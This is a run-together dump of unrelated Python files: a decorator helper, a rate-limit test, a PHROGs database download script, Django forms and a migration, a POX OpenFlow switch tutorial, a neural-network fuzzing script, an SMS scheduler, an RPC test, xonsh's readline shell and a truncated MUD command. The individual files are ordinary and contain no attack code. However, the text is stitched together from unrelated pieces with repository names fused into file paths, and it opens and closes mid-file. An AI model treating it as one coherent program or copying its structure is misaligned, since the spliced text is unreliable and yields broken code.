template = textwrap.dedent("""{0}\ def {name}({sig1}): return __{name}__func({sig2}) """.format('\n' * lineno, name=name, sig1=def_signature, sig2=call_signature)) code = compile(template, filename, 'single') eval(code, global_vars, local_vars) new_func = local_vars[name] new_func.__module__ = modname new_func.__doc__ = func.__doc__ return new_func artemis/general/test_global_rates.py import itertools import time from artemis.general.global_rates import limit_rate, limit_iteration_rate from artemis.general.global_vars import global_context def test_limit_rate(): with global_context(): start = time.time() for t in itertools.count(0): limit_rate('this_rate', period=0.1) current = time.time() if current - start > 0.5: break print((t, current - start)) assert t<6 def test_limit_rate_iterator(): with global_context(): start = time.time() for t in limit_iteration_rate(itertools.count(0), period=0.1): current = time.time() if current - start > 0.5: break print((t, current - start)) assert t<6 if __name__ == '__main__': test_limit_rate() test_limit_rate_iterator() #!/usr/bin/env python3 import os import sys import subprocess as sp def instantiate_install(db_dir): instantiate_dir(db_dir) get_phrog_mmseqs(db_dir) get_phrog_annot_table(db_dir) get_phrog_hhmer(db_dir) def instantiate_dir(db_dir): if os.path.isdir(db_dir) == False: os.mkdir(db_dir) def get_phrog_mmseqs(db_dir): print("Getting PHROGs MMSeqs DB") filepath = "https://phrogs.lmge.uca.fr/downloads_from_website/phrogs_mmseqs_db.tar.gz" tarball = "phrogs_mmseqs_db.tar.gz" folder = "phrogs_mmseqs_db" # get tarball if not already present if os.path.isfile(os.path.join(db_dir,tarball)) == True: print("PHROGs Database already downloaded") # download tarball and untar else: try: sp.call(["wget", filepath, "-P", db_dir]) except: sys.stderr.write("Error: PHROGs MMSeqs Database not found - link likely broken\n") return 0 # delete folder if it exists already if os.path.isfile(os.path.join(db_dir,folder)) == True: sp.call(["rm", os.path.join(db_dir,folder)]) # download untar -C for specifying the directory sp.call(["tar", "-xzf", os.path.join(db_dir, tarball), "-C", db_dir]) def get_phrog_annot_table(db_dir): print("Getting PHROGs Annotation Table") filepath = "https://phrogs.lmge.uca.fr/downloads_from_website/phrog_annot_v3.tsv" file = "phrog_annot_v3.tsv" #if the file already exists if os.path.isfile(os.path.join(db_dir,file)) == True: print("PHROGs annotation file already downloaded") else: try: sp.call(["wget", filepath, "-P", db_dir]) except: sys.stderr.write("Error: PHROGs annotation file not found - link likely broken\n") return 0 def get_phrog_hhmer(db_dir): print("Getting PHROGs HHmer DB") filepath = "https://phrogs.lmge.uca.fr/downloads_from_website/phrogs_hhsuite_db.tar.gz" tarball = "phrogs_hhsuite_db.tar.gz" folder = "phrogs_hhsuite_db" # get tarball if not already present if os.path.isfile(os.path.join(db_dir,tarball)) == True: print("PHROGs Database already downloaded") # download tarball and untar else: try: sp.call(["wget", filepath, "-P", db_dir]) except: sys.stderr.write("Error: PHROGs HMMer Database not found - link likely broken\n") return 0 # delete folder if it exists already if os.path.isfile(os.path.join(db_dir,folder)) == True: sp.call(["rm", os.path.join(db_dir,folder)]) # download untar -C for specifying the directory sp.call(["tar", "-xzf", os.path.join(db_dir, tarball), "-C", db_dir]) xebia-france/luigi-airflowlove_matcher/refactored/preprocessing/raw_set_processing.py1-10 class RawSetProcessing: """ This class aims to 
load and clean the dataset. """ def __init__(self, features): self.features = features # Select variables to process and include in the model @staticmethod def subset_features(features, df): sel_vars_df = df[features] return sel_vars_df @staticmethod # Remove ids with missing values def remove_ids_with_missing_values(df): sel_vars_filled_df = df.dropna() return sel_vars_filled_df @staticmethod def drop_duplicated_values(df): df = df.drop_duplicates() return df # Combine processing stages def combiner_pipeline(self, dataframe): raw_dataset = dataframe subset_df = self.subset_features(self.features,raw_dataset) subset_no_dup_df = self.drop_duplicated_values(subset_df) subset_filled_df = self.remove_ids_with_missing_values(subset_no_dup_df) return subset_filled_df 10-100 from machinable import Component class InheritedFlatness(Component): pass from django import forms from . models import HospitalM class HospitalM_Form(forms.ModelForm): class Meta: model = HospitalM fields = '__all__'from roglick.dungeon import features from roglick.engine.ecs import SystemBase from roglick.engine import event from roglick.events import ActionCompleteEvent,OpenDoorEvent,MapChangedEvent,MessageEvent class InteractionSystem(SystemBase): @event.event_handler(OpenDoorEvent) def open_door_handler(self, openevent): # Change the door Feature to an open door x, y = openevent.x, openevent.y self._world.current_map.tiles[x][y].add_feature(features.open_door) # Dispatch a new message event.dispatch(MessageEvent("You open the door")) # We've changed the map, signal that event.dispatch(MapChangedEvent()) # Now dispatch the ActionCompleteEvent; 1000 Fatigue to open a door event.dispatch(ActionCompleteEvent(openevent.entity, 1000)) import logging import hashlib import torch import torch.nn as nn from tqdm import tqdm from dataset import generate_test_dataset, load_dataset from generic_search import GenericSearcher from model import load_model from arguments import parser from utils import * conv_info = {} def load_select_info(opt): fpath = os.path.join(opt.output_dir, opt.dataset, opt.model, 'susp_filters.json') with open(fpath, 'r') as f: susp = json.load(f) return susp @torch.no_grad() def test( opt, model, testloader, device, susp, desc="Evaluate", tqdm_leave=True): model.eval() global conv_info nconv = [] correct, total = 0, 0 with tqdm(testloader, desc=desc, leave=tqdm_leave) as tepoch: for inputs, descs, targets in tepoch: conv_info.clear() inputs, targets = inputs.to(device), targets.to(device) outputs = model(inputs) total += targets.size(0) _, predicted = outputs.max(1) comp = predicted.eq(targets) correct += comp.sum().item() acc = 100. 
* correct / total tepoch.set_postfix(acc=acc) # logging the adversarial samples err_idx = (~comp).nonzero().flatten().tolist() for eid in err_idx: p = predicted[eid].item() t = targets[eid].item() if opt.politice == 'random': f = 'none' else: f = '' susp_l2chn = susp[str(t)] for lname, chns in susp_l2chn.items(): if len(chns) == 0: continue f += lname + ':' act_info, num_neu = conv_info[lname] for chn in chns: num_act = act_info[eid][chn].sum().item() ratio = num_act / num_neu if ratio > 0.5: f += str(chn) + ',' f = str(int(hashlib.sha1(f.encode('utf-8')).hexdigest(), 16) % (10 ** 8)) logging.info('%s | %s - %s', descs[eid], f'predict: {p}, target: {t}', f'cat: {f}') # statistic converage if opt.politice == 'random': continue for i, t in enumerate(targets): sum_act, sum_neu = 0, 0 if opt.politice == 'negconv': susp_l2chn = susp[str(t.item())] for lname, chns in susp_l2chn.items(): if len(chns) == 0: continue act_info, num_neu = conv_info[lname] sum_act += act_info[i][chns].sum().item() sum_neu += (len(chns) * num_neu) else: # neuconv for lname in conv_info.keys(): act_info, num_neu = conv_info[lname] sum_act += act_info[i].sum().item() sum_neu += (len(act_info[i]) * num_neu) conv = sum_act / sum_neu if sum_neu > 0 else 0 nconv.append(conv) if opt.politice == 'random': return None # mconv, _ = torch.tensor(nconv).view(opt.num_test, opt.popsize, -1).max(dim=-1) mconv = torch.tensor(nconv).view(opt.num_test, opt.popsize, -1) return mconv def _forward_conv(lname): def __hook(module, finput, foutput): global conv_info b, c, *_ = foutput.size() squeeze = foutput.view(b, c, -1) num_neu = squeeze.size(-1) actives = (squeeze > 0).sum(dim=-1).cpu() conv_info[lname] = (actives, num_neu) return __hook def main(): opt = parser.parse_args() print(opt) guard_options(opt) logging.basicConfig( format='%(asctime)s - %(message)s', filename=os.path.join( opt.output_dir, opt.dataset, opt.model, f'adversarial_samples_{opt.politice}_g{opt.gpu_id}.log' ), filemode='w', level=logging.INFO ) device = torch.device(opt.device if torch.cuda.is_available() else "cpu") model = load_model(opt).to(device) if opt.politice.endswith('conv'): for n, m in model.named_modules(): if isinstance(m, nn.Conv2d): m.register_forward_hook(_forward_conv(n)) susp = load_select_info(opt) else: susp = None testset = load_dataset(opt) opt.num_test = len(testset) gene = GenericSearcher(opt, num_test=opt.num_test) for e in range(opt.fuzz_epoch): print('fuzz epoch =', e) mutators = gene.generate_next_population() testloader = generate_test_dataset(opt, testset, mutators) mconv = test(opt, model, testloader, device, susp) gene.fitness(mconv) print('[info] Done.') if __name__ == "__main__": main() PartA_Hub/sw-part-a.py # Copyright 2012 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ This component is for use with the OpenFlow tutorial. It acts as a simple hub, but can be modified to act like an L2 learning switch. It's roughly similar to the one did for NOX. 
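
A hedged outline of the learning-switch variant implemented in act_like_switch
below (just the shape of it, not a drop-in solution):

    mac_to_port[packet.src] = packet_in.in_port   # learn the source port
    if packet.dst in mac_to_port:                 # known destination: install a flow / forward
        ...
    else:
        resend_packet(packet_in, of.OFPP_ALL)     # unknown destination: flood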
""" from pox.core import core import pox import pox.openflow.libopenflow_01 as of from pox.lib.packet.ethernet import ethernet, ETHER_BROADCAST from pox.lib.packet.ipv4 import ipv4 from pox.lib.packet.arp import arp import pox.lib.packet as pkt from pox.lib.addresses import IPAddr, EthAddr from pox.lib.util import str_to_bool, dpid_to_str from pox.lib.recoco import Timer log = core.getLogger() from pox.lib.revent import * import time import time # Timeout for flows FLOW_IDLE_TIMEOUT = 10 # Timeout for ARP entries ARP_TIMEOUT = 60 * 2 # Maximum number of packet to buffer on a switch for an unknown IP MAX_BUFFERED_PER_IP = 5 # Maximum time to hang on to a buffer for an unknown IP in seconds MAX_BUFFER_TIME = 5 class Entry (object): """ Not strictly an ARP entry. We use the port to determine which port to forward traffic out of. We use the MAC to answer ARP replies. We use the timeout so that if an entry is older than ARP_TIMEOUT, we flood the ARP request rather than try to answer it ourselves. """ def __init__ (self, port, mac): self.timeout = time.time() + ARP_TIMEOUT self.port = port self.mac = mac def __eq__ (self, other): if type(other) == tuple: return (self.port,self.mac)==other else: return (self.port,self.mac)==(other.port,other.mac) def __ne__ (self, other): return not self.__eq__(other) def isExpired (self): if self.port == of.OFPP_NONE: return False return time.time() > self.timeout def dpid_to_mac (dpid): return EthAddr("%012x" % (dpid & 0xffFFffFFffFF,)) class Tutorial (object): """ A Tutorial object is created for each switch that connects. A Connection object for that switch is passed to the __init__ function. """ def __init__ (self, connection): # Keep track of the connection to the switch so that we can # send it messages! self.connection = connection # This binds our PacketIn event listener connection.addListeners(self) # output action for sending packets to all ports out_action = of.ofp_action_output(port = of.OFPP_FLOOD) # Use this table to keep track of which ethernet address is on # which switch port (keys are MACs, values are ports). self.mac_to_port = {} # For each switch, we map IP addresses to Entries self.arpTable = {} self.lost_buffers = {} def _send_lost_buffers (self, dpid, ipaddr, macaddr, port): """ We may have "lost" buffers -- packets we got but didn't know where to send at the time. We may know now. Try and see. """ if (dpid,ipaddr) in self.lost_buffers: # Yup! bucket = self.lost_buffers[(dpid,ipaddr)] del self.lost_buffers[(dpid,ipaddr)] log.debug("Sending %i buffered packets to %s from %s" % (len(bucket),ipaddr,dpid_to_str(dpid))) for _,buffer_id,in_port in bucket: po = of.ofp_packet_out(buffer_id=buffer_id,in_port=in_port) po.actions.append(of.ofp_action_dl_addr.set_dst(macaddr)) po.actions.append(of.ofp_action_output(port = port)) core.openflow.sendToDPID(dpid, po) def resend_packet (self, packet_in, out_port): """ Instructs the switch to resend a packet that it had sent to us. "packet_in" is the ofp_packet_in object the switch had sent to the controller due to a table-miss. """ msg = of.ofp_packet_out() msg.data = packet_in # Add an action to send to the specified port action = of.ofp_action_output(port = out_port) msg.actions.append(action) # Send message to switch self.connection.send(msg) def act_like_hub (self, packet, packet_in): """ Implement hub-like behavior -- send all packets to all ports besides the input port. """ # We want to output to all ports -- we do that using the special # OFPP_ALL port as the output port. 
(We could have also used # OFPP_FLOOD.) self.resend_packet(packet_in, of.OFPP_ALL) # Note that if we didn't get a valid buffer_id, a slightly better # implementation would check that we got the full data before # sending it (len(packet_in.data) should be == packet_in.total_len)). def act_like_switch (self, packet, packet_in): """ Implement switch-like behavior. """ # Here's some psuedocode to start you off implementing a learning # switch. You'll need to rewrite it as real Python code. # Learn the port for the source MAC self.mac_to_port[packet.src] = packet_in.in_port #... if packet.dst in self.mac_to_port: # Send packet out the associated port #self.resend_packet(packet_in, self.mac_to_port[packet.dst]) #''' # Once you have the above working, try pushing a flow entry # instead of resending the packet (comment out the above and # uncomment and complete the below.) log.debug("Installing this flow...") # Maybe the log statement should have source/destination/port? #log.debug("Installing %s -> %s.%i" %(packet.src, packet.dst, dst_port)) #msg = of.ofp_flow_mod() # ## Set fields to match received packet msg = of.ofp_flow_mod() #msg.idle_timeout = 10 #msg.hard_timeout = 30 msg.buffer_id = packet_in.buffer_id msg.match = of.ofp_match.from_packet(packet) #msg.match.dl_type = 0x806 #msg.tp_src = None #msg.tp_dst = None #msg.nw_tos = None msg.match.dl_src = packet.src msg.match.dl_dst = packet.dst msg.actions.append(of.ofp_action_output(port = self.mac_to_port[packet.dst])) #print msg self.connection.send(msg) # #< Set other fields of flow_mod (timeouts? buffer_id?) > # #< Add an output action, and send -- similar to resend_packet() > #''' else: # Flood the packet out everything but the input port # This part looks familiar, right? log.debug("Installing else flow...") self.resend_packet(packet_in, of.OFPP_ALL) def _handle_PacketIn (self, event): """ #Handles packet in messages from the switch. """ packet = event.parsed # This is the parsed packet data. if not packet.parsed: log.warning("Ignoring incomplete packet") return packet_in = event.ofp # The actual ofp_packet_in message. # Comment out the following line and uncomment the one after # when starting the exercise. 
#self.act_like_hub(packet, packet_in) self.act_like_switch(packet, packet_in) def launch (): """ Starts the component """ def start_switch (event): log.debug("Controlling %s" % (event.connection,)) Tutorial(event.connection) core.openflow.addListenerByName("ConnectionUp", start_switch) # Generated by Django 3.2.6 on 2021-08-05 05:18 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('streetsignup', '0012_street_city_site'), ('pages', '0007_menupage_icon'), ] operations = [ migrations.AddField( model_name='homepage', name='city', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='streetsignup.city'), preserve_default=False, ), ] from datetime import datetime from pytz import country_timezones, timezone from pytz.exceptions import UnknownTimeZoneError import pycountry from SmsScheduler.logger import logger, log_exception class Country(object): """ This class defines Country and methods for getting country code, time zone, and current time in country """ def __init__(self, country): self.country = country def get_country_code(self): """ Returns the country code :param self: Instance of Country :return: Country code :rtype: str """ try: return pycountry.countries.get(name=self.country).alpha_2 except (KeyError, AttributeError) as e: logger.error(e) logger.error(log_exception()) def get_time_zone(self): """ Returns the timezone of the country :param self: Instance of Country :return: timezone :rtype: str """ try: timezone_country = {} country_code = self.get_country_code() for countrycode in country_timezones: timezones = country_timezones[countrycode] for tz in timezones: timezone_country[countrycode] = tz return timezone_country[country_code] except (KeyError, ValueError, AttributeError, TypeError) as e: logger.error(e) logger.error(log_exception()) def get_current_time(self): """ Returns the current time in specific country :param self: Instance of Country :return: current_time :rtype: datetime.datetime """ try: tz = self.get_time_zone() now = datetime.now(timezone(tz)) except (AttributeError, UnknownTimeZoneError) as e: logger.error(e) logger.error(log_exception()) return now class CountryDelay(Country): """ Manages delay on the basic od schedule time and selected country """ def __init__(self, country, schedule_time): try: super().__init__(country) self.schedule_time = schedule_time except (AttributeError, TypeError) as e: logger.error(e) logger.error(log_exception()) def get_delay(self): """ Returns the time in delivery of message, based on country and schedule time :param self: Instance of CountryDelay :return: time remaining in sending message (seconds) :rtype: int """ try: time_now = self.get_current_time().timestamp() schedule_time = datetime.strptime(self.schedule_time, "%Y-%m-%d %I:%M %p").timestamp() return int(schedule_time-time_now) except ValueError as e: logger.error(e) logger.error(log_exception()) andreycizov/python-xrpcxrpc_tests/examples/test_exemplary.py0 from time import sleep from xrpc.client import client_transport from xrpc.error import HorizonPassedError from xrpc.examples.exemplary_rpc import ExemplaryRPC from xrpc.popen import wait_all from xrpc_tests.mp.abstract import ProcessHelperCase, server_main def exemplary_main(addr): return ExemplaryRPC, ExemplaryRPC() class TestExemplary(ProcessHelperCase): def test_exemplary(self): addr_a = 'udp://127.0.0.1:7483' addr_b = 'udp://' ax = self.ps.popen(server_main, exemplary_main, addr_a) with 
client_transport(ExemplaryRPC, dest=addr_a, origin=addr_b) as r: while True: try: a = r.move_something(5, 6, 8, pop='asd') b = r.reply(5, 6, 8, pop='asd') c = r.exit() break except HorizonPassedError: sleep(0) self.assertEqual(wait_all(ax, max_wait=5), [0]) xonsh/readline_shell.py # -*- coding: utf-8 -*- """The readline based xonsh shell. Portions of this code related to initializing the readline library are included from the IPython project. The IPython project is: * Copyright (c) 2008-2014, IPython Development Team * Copyright (c) 2001-2007, <> * Copyright (c) 2001, <> * Copyright (c) 2001, <> """ import os import sys import cmd import time import select import builtins import importlib import threading import collections from xonsh.lazyjson import LazyJSON from xonsh.lazyasd import LazyObject from xonsh.base_shell import BaseShell from xonsh.ansi_colors import ansi_partial_color_format, ansi_color_style_names, ansi_color_style from xonsh.prompt.base import partial_format_prompt, multiline_prompt from xonsh.tools import print_exception from xonsh.platform import ON_WINDOWS, ON_CYGWIN, ON_DARWIN from xonsh.lazyimps import pygments, pyghooks terminal256 = LazyObject( lambda: importlib.import_module('pygments.formatters.terminal256'), globals(), 'terminal') readline = None RL_COMPLETION_SUPPRESS_APPEND = RL_LIB = RL_STATE = None RL_CAN_RESIZE = False RL_DONE = None RL_VARIABLE_VALUE = None _RL_STATE_DONE = 0x1000000 _RL_STATE_ISEARCH = 0x0000080 _RL_PREV_CASE_SENSITIVE_COMPLETIONS = 'to-be-set' def setup_readline(): """Sets up the readline module and completion suppression, if available.""" global RL_COMPLETION_SUPPRESS_APPEND, RL_LIB, RL_CAN_RESIZE, RL_STATE, readline if RL_COMPLETION_SUPPRESS_APPEND is not None: return for _rlmod_name in ('gnureadline', 'readline'): try: readline = importlib.import_module(_rlmod_name) sys.modules['readline'] = readline except ImportError: pass else: break if readline is None: print("""Skipping setup. Because no `readline` implementation available. Please install a backend (`readline`, `prompt-toolkit`, etc) to use `xonsh` interactively. 
See https://github.com/xonsh/xonsh/issues/1170""") return import ctypes import ctypes.util uses_libedit = readline.__doc__ and 'libedit' in readline.__doc__ readline.set_completer_delims(' \t\n') # Cygwin seems to hang indefinitely when querying the readline lib if (not ON_CYGWIN) and (not readline.__file__.endswith('.py')): RL_LIB = lib = ctypes.cdll.LoadLibrary(readline.__file__) try: RL_COMPLETION_SUPPRESS_APPEND = ctypes.c_int.in_dll( lib, 'rl_completion_suppress_append') except ValueError: # not all versions of readline have this symbol, ie Macs sometimes RL_COMPLETION_SUPPRESS_APPEND = None try: RL_STATE = ctypes.c_int.in_dll(lib, 'rl_readline_state') except Exception: pass RL_CAN_RESIZE = hasattr(lib, 'rl_reset_screen_size') env = builtins.__xonsh_env__ # reads in history readline.set_history_length(-1) ReadlineHistoryAdder() # sets up IPython-like history matching with up and down readline.parse_and_bind('"\e[B": history-search-forward') readline.parse_and_bind('"\e[A": history-search-backward') # Setup Shift-Tab to indent readline.parse_and_bind('"\e[Z": "{0}"'.format(env.get('INDENT'))) # handle tab completion differences found in libedit readline compatibility # as discussed at http://stackoverflow.com/a/7116997 if uses_libedit and ON_DARWIN: readline.parse_and_bind("bind ^I rl_complete") print('\n'.join(['', "*" * 78, "libedit detected - readline will not be well behaved, including but not limited to:", " * crashes on tab completion", " * incorrect history navigation", " * corrupting long-lines", " * failure to wrap or indent lines properly", "", "It is highly recommended that you install gnureadline, which is installable with:", " pip install gnureadline", "*" * 78]), file=sys.stderr) else: readline.parse_and_bind("tab: complete") # try to load custom user settings inputrc_name = os.environ.get('INPUTRC') if inputrc_name is None: if uses_libedit: inputrc_name = '.editrc' else: inputrc_name = '.inputrc' inputrc_name = os.path.join(os.path.expanduser('~'), inputrc_name) if (not ON_WINDOWS) and (not os.path.isfile(inputrc_name)): inputrc_name = '/etc/inputrc' if os.path.isfile(inputrc_name): try: readline.read_init_file(inputrc_name) except Exception: # this seems to fail with libedit print_exception('xonsh: could not load readline default init file.') def teardown_readline(): """Tears down up the readline module, if available.""" try: import readline except (ImportError, TypeError): return def _rebind_case_sensitive_completions(): # handle case sensitive, see Github issue #1342 for details global _RL_PREV_CASE_SENSITIVE_COMPLETIONS env = builtins.__xonsh_env__ case_sensitive = env.get('CASE_SENSITIVE_COMPLETIONS') if case_sensitive is _RL_PREV_CASE_SENSITIVE_COMPLETIONS: return if case_sensitive: readline.parse_and_bind("set completion-ignore-case off") else: readline.parse_and_bind("set completion-ignore-case on") _RL_PREV_CASE_SENSITIVE_COMPLETIONS = case_sensitive def fix_readline_state_after_ctrl_c(): """ Fix to allow Ctrl-C to exit reverse-i-search. 
Based on code from: http://bugs.python.org/file39467/raw_input__workaround_demo.py """ if ON_WINDOWS: # hack to make pyreadline mimic the desired behavior try: _q = readline.rl.mode.process_keyevent_queue if len(_q) > 1: _q.pop() except Exception: pass if RL_STATE is None: return if RL_STATE.value & _RL_STATE_ISEARCH: RL_STATE.value &= ~_RL_STATE_ISEARCH if not RL_STATE.value & _RL_STATE_DONE: RL_STATE.value |= _RL_STATE_DONE def rl_completion_suppress_append(val=1): """Sets the rl_completion_suppress_append varaiable, if possible. A value of 1 (default) means to suppress, a value of 0 means to enable. """ if RL_COMPLETION_SUPPRESS_APPEND is None: return RL_COMPLETION_SUPPRESS_APPEND.value = val def rl_variable_dumper(readable=True): """Dumps the currently set readline variables. If readable is True, then this output may be used in an inputrc file. """ RL_LIB.rl_variable_dumper(int(readable)) def rl_variable_value(variable): """Returns the currently set value for a readline configuration variable.""" global RL_VARIABLE_VALUE if RL_VARIABLE_VALUE is None: import ctypes RL_VARIABLE_VALUE = RL_LIB.rl_variable_value RL_VARIABLE_VALUE.restype = ctypes.c_char_p env = builtins.__xonsh_env__ enc, errors = env.get('XONSH_ENCODING'), env.get('XONSH_ENCODING_ERRORS') if isinstance(variable, str): variable = variable.encode(encoding=enc, errors=errors) rtn = RL_VARIABLE_VALUE(variable) return rtn.decode(encoding=enc, errors=errors) def _insert_text_func(s, readline): """Creates a function to insert text via readline.""" def inserter(): readline.insert_text(s) readline.redisplay() return inserter DEDENT_TOKENS = LazyObject(lambda: frozenset(['raise', 'return', 'pass', 'break', 'continue']), globals(), 'DEDENT_TOKENS') class ReadlineShell(BaseShell, cmd.Cmd): """The readline based xonsh shell.""" def __init__(self, completekey='tab', stdin=None, stdout=None, **kwargs): super().__init__(completekey=completekey, stdin=stdin, stdout=stdout, **kwargs) setup_readline() self._current_indent = '' self._current_prompt = '' self._force_hide = None self.cmdqueue = collections.deque() def __del__(self): teardown_readline() def singleline(self, store_in_history=True, **kwargs): """Reads a single line of input. The store_in_history kwarg flags whether the input should be stored in readline's in-memory history. 
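
        When store_in_history is False, the entry is removed from readline's
        in-memory history right after input() returns; roughly (a sketch of the
        body below):

            pos = readline.get_current_history_length() - 1
            rtn = input(self.prompt)
            readline.remove_history_item(pos)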
""" if not store_in_history: # store current position to remove it later try: import readline except ImportError: store_in_history = True pos = readline.get_current_history_length() - 1 rtn = input(self.prompt) if not store_in_history and pos >= 0: readline.remove_history_item(pos) return rtn def parseline(self, line): """Overridden to no-op.""" return '', line, line def completedefault(self, text, line, begidx, endidx): """Implements tab-completion for text.""" rl_completion_suppress_append() # this needs to be called each time _rebind_case_sensitive_completions() line = builtins.aliases.expand_alias(line) mline = line.partition(' ')[2] offs = len(mline) - len(text) if self.completer is None: x = [] else: x = [(i[offs:] if " " in i[:-1] else i) for i in self.completer.complete(text, line, begidx, endidx, ctx=self.ctx)[0]] return x # tab complete on first index too completenames = completedefault def _load_remaining_input_into_queue(self): buf = b'' while True: r, w, x = select.select([self.stdin], [], [], 1e-6) if len(r) == 0: break buf += os.read(self.stdin.fileno(), 1024) if len(buf) > 0: buf = buf.decode().replace('\r\n', '\n').replace('\r', '\n') self.cmdqueue.extend(buf.splitlines(keepends=True)) def postcmd(self, stop, line): """Called just before execution of line. For readline, this handles the automatic indentation of code blocks. """ try: import readline except ImportError: return stop if self.need_more_lines: if len(line.strip()) == 0: readline.set_pre_input_hook(None) self._current_indent = '' elif line.rstrip()[-1] == ':': ind = line[:len(line) - len(line.lstrip())] ind += builtins.__xonsh_env__.get('INDENT') readline.set_pre_input_hook(_insert_text_func(ind, readline)) self._current_indent = ind elif line.split(maxsplit=1)[0] in DEDENT_TOKENS: env = builtins.__xonsh_env__ ind = self._current_indent[:-len(env.get('INDENT'))] readline.set_pre_input_hook(_insert_text_func(ind, readline)) self._current_indent = ind else: ind = line[:len(line) - len(line.lstrip())] if ind != self._current_indent: insert_func = _insert_text_func(ind, readline) readline.set_pre_input_hook(insert_func) self._current_indent = ind else: readline.set_pre_input_hook(None) return stop def _cmdloop(self, intro=None): """Repeatedly issue a prompt, accept input, parse an initial prefix off the received input, and dispatch to action methods, passing them the remainder of the line as argument. This was forked from Lib/cmd.py from the Python standard library v3.4.3, (C) Python Software Foundation, 2015. """ self.preloop() if self.use_rawinput and self.completekey: try: import readline self.old_completer = readline.get_completer() readline.set_completer(self.complete) readline.parse_and_bind(self.completekey + ": complete") have_readline = True except ImportError: have_readline = False try: if intro is not None: self.intro = intro if self.intro: self.stdout.write(str(self.intro) + "\n") stop = None while not stop: line = None exec_now = False if len(self.cmdqueue) > 0: line = self.cmdqueue.popleft() exec_now = line.endswith('\n') if self.use_rawinput and not exec_now: inserter = None if line is None \ else _insert_text_func(line, readline) if inserter is not None: readline.set_pre_input_hook(inserter) try: line = self.singleline() except EOFError: if builtins.__xonsh_env__.get("IGNOREEOF"): self.stdout.write('Use "exit" to leave the shell.' 
'\n') line = '' else: line = 'EOF' if inserter is not None: readline.set_pre_input_hook(None) else: self.print_color(self.prompt, file=self.stdout) if line is not None: os.write(self.stdin.fileno(), line.encode()) if not exec_now: line = self.stdin.readline() if len(line) == 0: line = 'EOF' else: line = line.rstrip('\r\n') if have_readline and line != 'EOF': readline.add_history(line) if not ON_WINDOWS: # select() is not fully functional on windows self._load_remaining_input_into_queue() line = self.precmd(line) stop = self.onecmd(line) stop = self.postcmd(stop, line) self.postloop() finally: if self.use_rawinput and self.completekey: try: import readline readline.set_completer(self.old_completer) except ImportError: pass def cmdloop(self, intro=None): while not builtins.__xonsh_exit__: try: self._cmdloop(intro=intro) except KeyboardInterrupt: print() # Gives a newline fix_readline_state_after_ctrl_c() self.reset_buffer() intro = None @property def prompt(self): """Obtains the current prompt string.""" global RL_LIB, RL_CAN_RESIZE if RL_CAN_RESIZE: # This is needed to support some system where line-wrapping doesn't # work. This is a bug in upstream Python, or possibly readline. RL_LIB.rl_reset_screen_size() if self.need_more_lines: if self.mlprompt is None: try: self.mlprompt = multiline_prompt(curr=self._current_prompt) except Exception: # pylint: disable=broad-except print_exception() self.mlprompt = ' ' return self.mlprompt env = builtins.__xonsh_env__ # pylint: disable=no-member p = env.get('PROMPT') try: p = partial_format_prompt(p) except Exception: # pylint: disable=broad-except print_exception() hide = True if self._force_hide is None else self._force_hide p = ansi_partial_color_format(p, style=env.get('XONSH_COLOR_STYLE'), hide=hide) self._current_prompt = p self.settitle() return p def format_color(self, string, hide=False, **kwargs): """Readline implementation of color formatting. This usesg ANSI color codes. """ hide = hide if self._force_hide is None else self._force_hide return ansi_partial_color_format(string, hide=hide, style=builtins.__xonsh_env__.get('XONSH_COLOR_STYLE')) def print_color(self, string, hide=False, **kwargs): if isinstance(string, str): s = self.format_color(string, hide=hide) else: # assume this is a list of (Token, str) tuples and format it env = builtins.__xonsh_env__ self.styler.style_name = env.get('XONSH_COLOR_STYLE') style_proxy = pyghooks.xonsh_style_proxy(self.styler) formatter = terminal256.Terminal256Formatter(style=style_proxy) s = pygments.format(string, formatter).rstrip() print(s, **kwargs) def color_style_names(self): """Returns an iterable of all available style names.""" return ansi_color_style_names() def color_style(self): """Returns the current color map.""" style = style = builtins.__xonsh_env__.get('XONSH_COLOR_STYLE') return ansi_color_style(style=style) class ReadlineHistoryAdder(threading.Thread): def __init__(self, wait_for_gc=True, *args, **kwargs): """Thread responsible for adding inputs from history to the current readline instance. May wait for the history garbage collector to finish. 
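
        wait_for_gc: when True, run() blocks until the history garbage
        collector thread (hist.gc) has finished before replaying saved
        commands into readline.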
""" super(ReadlineHistoryAdder, self).__init__(*args, **kwargs) self.daemon = True self.wait_for_gc = wait_for_gc self.start() def run(self): try: import readline except ImportError: return hist = builtins.__xonsh_history__ while self.wait_for_gc and hist.gc.is_alive(): time.sleep(0.011) # gc sleeps for 0.01 secs, sleep a beat longer files = hist.gc.files() i = 1 for _, _, f in files: try: lj = LazyJSON(f, reopen=False) for command in lj['cmds']: inp = command['inp'].splitlines() for line in inp: if line == 'EOF': continue readline.add_history(line) if RL_LIB is not None: RL_LIB.history_set_pos(i) i += 1 lj.close() except (IOError, OSError, ValueError): continue seisatsu/DennisMUD-ESP32 ##################### # # # list_entrances.py # # Copyright 2020 # # # ##################### # ********** # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # ********** NAME = "list entrances" CATEGORIES = ["exits", "rooms"] USAGE = "list entrances [room_id]" DESCRIPTION = """List the entrances leading to a room. If a room ID is provided as an optional argument, list the entrances to that room. Otherwise, list the entrances to the room you are currently in. You must be an owner of the room to list its entrances. Wizards can list the entrances to any 